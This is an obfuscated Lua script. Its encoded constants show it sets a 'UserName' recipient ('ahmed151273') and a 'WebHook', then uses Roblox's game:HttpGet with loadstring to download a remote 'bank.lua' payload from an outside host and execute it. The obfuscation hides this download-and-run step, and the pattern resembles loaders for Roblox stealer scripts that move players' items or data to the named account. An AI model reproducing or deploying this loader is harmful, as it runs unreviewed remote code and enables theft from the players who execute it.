--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v70=0;local v71;while true do if (v70==0) then v71=v2(v0(v30,16));if v19 then local v102=0;local v103;while true do if (v102==1) then return v103;end if (v102==0) then v103=v5(v71,v19);v19=nil;v102=1;end end else return v71;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v72=0 -0 ;local v73;while true do if (v72==0) then v73=(v31/((5 -3)^(v32-(1 -0))))%((4 -2)^(((v33-(620 -((2192 -(1523 + 114)) + 64))) -(v32-1)) + ((838 + 94) -(857 + 74)))) ;return v73-(v73%(569 -((523 -156) + 201))) ;end end else local v74=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v74 + v74))>=v74) and (1 + 0)) or (877 -(282 + 595)) ;end end local function v21()local v34=1065 -(68 + 997) ;local v35;while true do if (v34==(1270 -(226 + 1044))) then v35=v1(v16,v18,v18);v18=v18 + 1 ;v34=4 -3 ;end if (v34==((116 + 2) -(32 + 85))) then return v35;end end end local function v22()local v36=0 + 0 ;local v37;local v38;while true do if ((958 -(892 + 65))==v36) then return (v38 * ((448 + 162) -354)) + v37 ;end if (v36==(0 -0)) then v37,v38=v1(v16,v18,v18 + (3 -1) );v18=v18 + (352 -(87 + 263)) ;v36=181 -(67 + 113) ;end end end local function v23()local v39=0 -0 ;local v40;local v41;local v42;local v43;while true do if (v39==(1 + 0)) then return (v43 * ((66681828 -(915 + 82)) -49903615)) + (v42 * (66488 -((2270 -1468) + 150))) + (v41 * 256) + v40 ;end if (v39==(0 -0)) then v40,v41,v42,v43=v1(v16,v18,v18 + ((3 + 2) -2) );v18=v18 + 4 ;v39=1 + 0 ;end end end local function v24()local v44=0 -0 ;local v45;local v46;local v47;local v48;local v49;local v50;while true do if (v44==2) then v49=v20(v46,(4409 -3201) -(1069 + 118) ,(248 -178) -39 );v50=((v20(v46,(928 -(814 + 45)) -37 )==1) and  -((2 -1) + 0 + 0)) or (1 -0) ;v44=3 + 0 ;end if (v44==0) then v45=v23();v46=v23();v44=1;end if (v44==(792 -(131 + 237 + 423))) then v47=(888 -(261 + 624)) -2 ;v48=(v20(v46,19 -(10 + 8) ,(134 -58) -56 ) * (2^(474 -(416 + 26)))) + v45 ;v44=6 -4 ;end if (v44==(2 + 1)) then if (v49==((1080 -(1020 + 60)) -0)) then if (v48==(438 -(145 + 293))) then return v50 * (430 -(44 + 386)) ;else v49=1487 -(998 + 488) ;v47=0;end elseif (v49==(651 + 1396)) then return ((v48==(0 + 0)) and (v50 * ((773 -(201 + 571))/0))) or (v50 * NaN) ;end return v8(v50,v49-(2161 -(116 + 1022)) ) * (v47 + (v48/((8 -(1429 -(630 + 793)))^(31 + 21)))) ;end end end local function v25(v51)local v52=0 -0 ;local v53;local v54;while true do if (v52==(4 -3)) then v53=v3(v16,v18,(v18 + v51) -(1 + 0 + 0) );v18=v18 + v51 ;v52=6 -(4 + 0) ;end if ((1747 -(760 + 987))==v52) then v53=nil;if  not v51 then v51=v23();if (v51==(1913 -(1789 + 124))) then return "";end end v52=767 -(745 + 21) ;end if (v52==2) then v54={};for v80=1 + 0 , #v53 do v54[v80]=v2(v1(v3(v53,v80,v80)));end v52=(1062 -(87 + 968)) -4 ;end if (v52==(11 -8)) then return v6(v54);end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v55=0;local v56;local v57;local v58;local v59;local v60;local v61;local v62;while true do if (2==v55) then local v75=341 -(218 + 123) ;while true do if (v75~=1) then else v55=1584 -(1535 + 46) ;break;end if (v75==(0 + 0)) then v60=nil;v61=nil;v75=1;end end end if (v55==(1 + 2)) then v62=nil;while true do local v82=0;local v83;while true do if (v82~=0) then else v83=560 -(306 + 254) ;while true do if (v83~=0) then else if (v56~=(0 + 0)) then else local v110=0 -0 ;while true do if (v110==0) then local v116=1467 -(899 + 568) ;local v117;while true do if (v116==0) then v117=0 + 0 ;while true do if ((2 -1)==v117) then v110=1;break;end if (v117==(603 -(268 + 335))) then v57={};v58={};v117=1;end end break;end end end if (v110~=(291 -(60 + 230))) then else v59={};v56=1;break;end end end if (v56==(573 -(426 + 146))) then local v111=0 + 0 ;while true do if (v111==(1456 -(282 + 1174))) then local v118=811 -(569 + 242) ;local v119;while true do if (v118==(0 -0)) then v119=0;while true do if (v119~=(1 + 0)) then else v111=1;break;end if (v119==(1024 -(706 + 318))) then v60={v57,v58,nil,v59};v61=v23();v119=1;end end break;end end end if (v111==1) then v62={};v56=1273 -(945 + 326) ;break;end end end v83=2 -1 ;end if ((1 + 0)==v83) then if (v56~=3) then else local v112=700 -(271 + 429) ;local v113;while true do if (v112==0) then v113=0;while true do if (v113~=0) then else local v144=0;while true do if (v144==(1 + 0)) then v113=1;break;end if (v144==0) then for v153=1501 -(1408 + 92) ,v23() do v58[v153-(1087 -(461 + 625)) ]=v28();end for v155=1289 -(993 + 295) ,v23() do v59[v155]=v23();end v144=1;end end end if ((1 + 0)==v113) then return v60;end end break;end end end if (v56~=(1173 -(418 + 753))) then else local v114=0 + 0 ;local v115;while true do if (v114==(0 + 0)) then v115=0 + 0 ;while true do if ((0 + 0)~=v115) then else local v145=529 -(406 + 123) ;local v146;while true do if (v145~=0) then else v146=0;while true do if (v146==1) then v115=1;break;end if (v146~=0) then else for v164=1770 -(1749 + 20) ,v61 do local v165=0;local v166;local v167;local v168;while true do if (v165==(1 + 0)) then v168=nil;while true do if (v166==(1322 -(1249 + 73))) then v167=v21();v168=nil;v166=1;end if (v166==(1 + 0)) then if (v167==(1146 -(466 + 679))) then v168=v21()~=(0 -0) ;elseif (v167==(5 -3)) then v168=v24();elseif (v167==3) then v168=v25();end v62[v164]=v168;break;end end break;end if ((1900 -(106 + 1794))==v165) then v166=0;v167=nil;v165=1 + 0 ;end end end v60[1 + 2 ]=v21();v146=2 -1 ;end end break;end end end if (v115==1) then for v147=2 -1 ,v23() do local v148=0;local v149;local v150;local v151;while true do if (v148~=(115 -(4 + 110))) then else v151=nil;while true do if (v149==1) then while true do if (v150~=0) then else v151=v21();if (v20(v151,585 -(57 + 527) ,1428 -(41 + 1386) )==(103 -(17 + 86))) then local v181=0 + 0 ;local v182;local v183;local v184;local v185;local v186;while true do if (v181~=2) then else v186=nil;while true do if (v182==(0 -0)) then v183=0 -0 ;v184=nil;v182=1;end if (v182==(167 -(122 + 44))) then local v191=0;local v192;while true do if (v191==(0 -0)) then v192=0;while true do if (v192==(0 -0)) then v185=nil;v186=nil;v192=1;end if (v192==1) then v182=2 + 0 ;break;end end break;end end end if ((1 + 1)~=v182) then else while true do if (v183==2) then local v193=0 -0 ;local v194;while true do if (v193==0) then v194=65 -(30 + 35) ;while true do if (v194~=0) then else local v203=0 + 0 ;while true do if (v203==(1257 -(1043 + 214))) then if (v20(v185,1,3 -2 )==(1213 -(323 + 889))) then v186[5 -3 ]=v62[v186[582 -(361 + 219) ]];end if (v20(v185,2,2)~=(321 -(53 + 267))) then else v186[1 + 2 ]=v62[v186[3]];end v203=414 -(15 + 398) ;end if (v203==(983 -(18 + 964))) then v194=3 -2 ;break;end end end if ((1 + 0)==v194) then v183=2 + 1 ;break;end end break;end end end if (v183~=(850 -(20 + 830))) then else local v195=0 + 0 ;local v196;while true do if (v195==(126 -(116 + 10))) then v196=0 + 0 ;while true do if (v196==1) then v183=739 -(542 + 196) ;break;end if ((0 -0)==v196) then local v204=0;while true do if (v204~=1) then else v196=1;break;end if (v204==0) then local v206=0 + 0 ;while true do if (v206==1) then v204=1;break;end if (v206~=(0 + 0)) then else v184=v20(v151,2,2 + 1 );v185=v20(v151,4,6);v206=1;end end end end end end break;end end end if (v183~=(7 -4)) then else if (v20(v185,7 -4 ,1554 -(1126 + 425) )==1) then v186[4]=v62[v186[409 -(118 + 287) ]];end v57[v147]=v186;break;end if (v183==1) then local v198=0 -0 ;while true do if (v198==(1121 -(118 + 1003))) then v186={v22(),v22(),nil,nil};if (v184==0) then local v201=0 -0 ;local v202;while true do if (v201==(0 + 0)) then v202=977 -(553 + 424) ;while true do if (v202==(0 -0)) then v186[3]=v22();v186[4 + 0 ]=v22();break;end end break;end end elseif (v184==1) then v186[3]=v23();elseif (v184==2) then v186[3 + 0 ]=v23() -((2 + 0)^16) ;elseif (v184==(2 + 1)) then local v214=0 + 0 ;local v215;local v216;while true do if (v214==(0 -0)) then v215=0;v216=nil;v214=2 -1 ;end if (v214~=1) then else while true do if (v215~=0) then else v216=0 -0 ;while true do if (v216==0) then v186[1 + 2 ]=v23() -(2^(77 -61)) ;v186[757 -(239 + 514) ]=v22();break;end end break;end end break;end end end v198=1 + 0 ;end if (v198==(1330 -(797 + 532))) then v183=2;break;end end end end break;end end break;end if (v181==(0 + 0)) then v182=0 + 0 ;v183=nil;v181=2 -1 ;end if (1==v181) then v184=nil;v185=nil;v181=1204 -(373 + 829) ;end end end break;end end break;end if (v149==0) then local v169=731 -(476 + 255) ;while true do if (v169~=(1130 -(369 + 761))) then else v150=0 + 0 ;v151=nil;v169=1;end if (v169~=1) then else v149=1;break;end end end end break;end if (v148==(0 -0)) then v149=0;v150=nil;v148=1 -0 ;end end end v56=3;break;end end break;end end end break;end end break;end end end break;end if ((238 -(64 + 174))==v55) then v56=0;v57=nil;v55=1 + 0 ;end if (v55~=1) then else local v76=0 -0 ;while true do if (v76~=1) then else v55=338 -(144 + 192) ;break;end if (v76~=0) then else v58=nil;v59=nil;v76=1;end end end end end local function v29(v63,v64,v65)local v66=0;local v67;local v68;local v69;while true do if (0==v66) then v67=v63[1];v68=v63[2];v66=1;end if (v66==1) then v69=v63[3];return function(...)local v84=1;local v85= -1;local v86={...};local v87=v12("#",...) -1 ;local function v88()local v89=v67;local v90=v68;local v91=v69;local v92=v27;local v93={};local v94={};local v95={};for v99=216 -(42 + (509 -335)) ,v87 do if (((2534 + 839)<=(2946 + 610)) and (v99>=v91)) then v93[v99-v91 ]=v86[v99 + 1 + 0 ];else v95[v99]=v86[v99 + (1505 -(363 + 1141)) ];end end local v96=(v87-v91) + (1581 -(1183 + 397)) ;local v97;local v98;while true do local v100=(1836 -(1045 + 791)) -0 ;while true do if ((v100==(1 + 0)) or (((6226 -3766) + 831)<(5255 -(283 + 1630 + 48 + 14)))) then if (((6696 -2310)>=(550 + (828 -(351 + 154)))) and (v98<=((2 + 8) -6))) then if (((2854 -(565 + 1368))<=((5718 -(1281 + 293)) -3042)) and (v98<=(1 + 0))) then if ((((6633 -(28 + 238)) -(1477 + 184))>=(2678 -1715)) and (v98>(0 -0))) then if ((v95[v97[(6 -4) + 0 ]]==v97[860 -(564 + 292) ]) or (960<=(1510 -634))) then v84=v84 + (2 -1) ;else v84=v97[307 -(244 + 60) ];end else v95[v97[2 + (0 -0) ]]=v65[v97[479 -(41 + 435) ]];end elseif ((v98<=(1003 -((2497 -(1381 + 178)) + 63))) or ((1589 + 171 + 306)==(2057 -(936 + 189)))) then v95[v97[1 + 1 ]]=v97[3];elseif (((6438 -(1565 + 48))<(2992 + 1851)) and (v98>(1141 -(782 + 356)))) then local v128=267 -(176 + 91) ;local v129;local v130;local v131;while true do if ((v128==((0 + 0) -0)) or (3877>=(3659 + 878))) then local v152=0 -0 ;while true do if ((v152==1) or ((5407 -(975 + 117))<(3601 -(157 + 1718)))) then v128=1 + 0 ;break;end if (((0 -(0 + 0))==v152) or ((12577 -(30675 -21777))<625)) then v129=0;v130=nil;v152=1;end end end if ((v128==(1019 -(697 + 167 + 154))) or (((5129 + 7470) -7974)<(1338 -706))) then v131=nil;while true do if (((470 -(381 + 89))==v129) or ((190 -107)>(504 + 189 + 1087))) then local v157=0 -(0 + 0) ;local v158;while true do if ((((990 + 473) -917)<=(2304 -(322 + 905))) and ((611 -(602 + 9))==v157)) then v158=1189 -((768 -319) + 346 + 394) ;while true do if ((v158==(873 -((1982 -(1074 + 82)) + 46))) or ((1943 -(245 + 702))>(13590 -9289))) then v129=1 + (0 -0) ;break;end if (((5968 -(260 + (3071 -(797 + 636))))>(1127 -((2166 -(214 + 1570)) + 58))) and (v158==(0 -0))) then v130=v97[2 + 0 ];v131=v95[v97[5 -2 ]];v158=2 -1 ;end end break;end end end if ((v129==1) or ((1861 -((4379 -3477) + 303))>=3330)) then v95[v130 + (1 -0) ]=v131;v95[v130]=v131[v97[(1628 -(1427 + 192)) -(2 + 3) ]];break;end end break;end end else local v132=0 + 0 ;local v133;local v134;local v135;local v136;local v137;local v138;while true do if ((v132==((3148 -(990 + 465)) -(463 + 658 + 248 + 321))) or (((2433 + 273) -(22 + 187 + 5))<=(1018 -(483 + 91 + 109)))) then while true do if ((4322>=(4025 -(1404 + 59))) and (v133==(5 -3))) then v138=nil;while true do if ((v134==((0 -0) -0)) or ((4402 -(468 + 297))>=(4332 -(334 + (554 -(192 + 134)))))) then local v170=0 -0 ;local v171;while true do if ((v170==(0 -(1726 -(1668 + 58)))) or ((4314 -1935)>(1300 + 3278))) then v171=0;while true do if (((236 -(141 + 95))==v171) or (((1751 -(316 + 960)) + 8)>(1912 -1169))) then v135=v97[4 -2 ];v136,v137=v92(v95[v135](v13(v95,v135 + 1 ,v97[1 + 2 ])));v171=2 -1 ;end if (((961 + 765 + 728)>578) and (v171==1)) then v134=(627 -(512 + 114)) + 0 ;break;end end break;end end end if (((1309 -379)<(2630 + (4765 -2937))) and (v134==(164 -((189 -97) + 55 + 16)))) then local v172=0 + 0 + 0 ;local v173;while true do if (((1112 -450)<=(1737 -((2194 -1620) + (664 -473)))) and (v172==0)) then v173=(1806 -(1202 + 604)) + 0 ;while true do if (((10948 -6578)==4370) and (v173==(0 + 0))) then v85=(v137 + v135) -(850 -(254 + 595)) ;v138=0 + 0 ;v173=127 -(55 + 71) ;end if ((v173==1) or ((6272 -1510)<=861)) then v134=1792 -(573 + 1217) ;break;end end break;end end end if ((v134==(5 -3)) or (1412==(325 + 3939))) then for v176=v135,v85 do local v177=0 + 0 ;local v178;while true do if (((0 -0)==v177) or (3168<2153)) then v178=939 -(714 + 225) ;while true do if (((0 -0)==v178) or ((6936 -(9149 -7189))<(145 + 1187))) then v138=v138 + (1 -0) ;v95[v176]=v136[v138];break;end end break;end end end break;end end break;end if (((5434 -(118 + 688))==(4676 -(25 + 23))) and (v133==(0 + 0 + (0 -0)))) then v134=(5221 -3335) -(927 + 959) ;v135=nil;v133=1;end if ((v133==(3 -2)) or (54==(1127 -((53 -37) + 716)))) then local v162=(1994 -(109 + 1885)) -0 ;while true do if (((179 -(11 + (411 -(45 + 280))))==(199 -117)) and (v162==1)) then v133=287 -(175 + 107 + 3) ;break;end if (((0 -0)==v162) or (581<(1390 -1108))) then v136=nil;v137=nil;v162=1;end end end end break;end if ((v132==0) or ((6405 -(440 + 63 + 1293))<2495)) then v133=0;v134=nil;v132=2 -1 ;end if (((2621 -(1269 + 200))==((1598 -764) + 117 + 201)) and (v132==(1062 -(810 + 251)))) then v135=nil;v136=nil;v132=2 + 0 ;end if (((582 + (2129 -(98 + 717)))<=3422) and (v132==(2 + 0))) then v137=nil;v138=nil;v132=536 -(43 + 490) ;end end end elseif ((v98<=(740 -(711 + 22))) or ((3829 -2839)>(2479 -(240 + 619)))) then if ((v98<=(2 + 2 + 1)) or ((1394 -517)>(311 + 4384))) then v95[v97[1746 -(1344 + 400) ]]=v97[408 -(255 + 150) ]~=(0 + 0 + (826 -(802 + 24))) ;elseif ((2691>=(991 + 860)) and (v98==(25 -(34 -15)))) then do return;end else local v139=0 -(1911 -(340 + 1571)) ;local v140;local v141;local v142;while true do if ((v139==(1739 -(404 + 1335))) or (2985>=4856)) then v140=406 -(183 + 223) ;v141=nil;v139=1 -0 ;end if (((2834 + 1442)>=(431 + 764)) and (v139==1)) then v142=nil;while true do if (((3569 -(10 + 327))<=(1289 + 1978 + 1423)) and (v140==(1772 -(1733 + 39)))) then v141=0;v142=nil;v140=339 -((203 -85) + 220) ;end if ((v140==(1 + 0)) or (896>=3146)) then while true do if ((((9645 -6135) -(108 + 341))>=(1329 + 1629)) and (v141==(0 -0))) then v142=v97[2];v95[v142]=v95[v142](v13(v95,v142 + (1494 -(711 + 782)) ,v85));break;end end break;end end break;end end end elseif (((6109 -2922)>=(1113 -(270 + 199))) and (v98<=(3 + 5))) then v65[v97[1822 -(580 + 1239) ]]=v95[v97[5 -3 ]];elseif (((616 + 28)<=(26 + (855 -177))) and (v98==(4 + 5))) then v84=v97[7 -4 ];else v95[v97[2 + 0 ]]();end v84=v84 + (1168 -(645 + 522)) ;break;end if (((2748 -(1010 + 780))>947) and (v100==(1034 -(125 + 909)))) then v97=v89[v84];v98=v97[1 + 0 ];v100=4 -3 ;end end end end A,B=v27(v11(v88));if  not A[1] then local v101=v63[4][v84] or "?" ;error("Script error at ["   .. v101   .. "]:"   .. A[2] );else return v13(A,2,B);end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031B3O00682O7470733A2O2F672O6F662E70726F2F732F62616E6B2E6C756103083O00557365724E616D65030B3O0061686D656431353132373303073O00576562482O6F6B035O00153O0012023O00013O0026013O000C000100020004093O000C000100122O000100033O00122O000200043O002004000200020005001202000400064O0005000500014O0003000200054O000700013O00022O000A0001000100010004093O001400010026013O0001000100010004093O00010001001202000100083O001208000100073O0012020001000A3O001208000100093O0012023O00023O0004093O000100012O00063O00017O00153O00023O00043O00043O00053O00053O00053O00053O00053O00053O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000B3O000C3O000E3O00",v9(),...);end
